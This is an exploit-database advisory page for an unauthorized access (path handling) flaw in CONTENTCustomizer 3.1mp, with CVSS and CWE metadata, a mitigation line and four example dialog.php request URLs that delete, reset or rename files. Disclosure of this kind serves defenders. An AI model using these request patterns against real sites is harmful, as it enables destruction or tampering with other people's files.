header-logo
Suggest Exploit
vendor:
CONTENTCustomizer
by:
7.5
CVSS
HIGH
Unauthorized Access
22
CWE
Product Name: CONTENTCustomizer
Affected Version From: 3.1mp
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Unauthorized Access Vulnerability in CONTENTCustomizer

The application fails to sanitize user-supplied input, allowing an attacker to delete arbitrary files, rename files, or reset the content of certain files.

Mitigation:

Implement input validation and sanitization techniques to prevent unauthorized access.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26437/info

CONTENTCustomizer is prone to an unauthorized access vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker could exploit this issue to delete arbitrary files, rename files, or reset the content of certain files.

CONTENTCustomizer 3.1mp is vulnerable; other versions may also be affected.

http://www.example.com/dialog.php?action=del&doc='+pagename // Delete
http://www.example.com/dialog.php?action=delbackup&doc='+pagename // Delete Backup
http://www.example.com/dialog.php?action=res&doc='+pagename // Reset
http://www.example.com/dialog.php?action=ren&doc='+pagename // Rename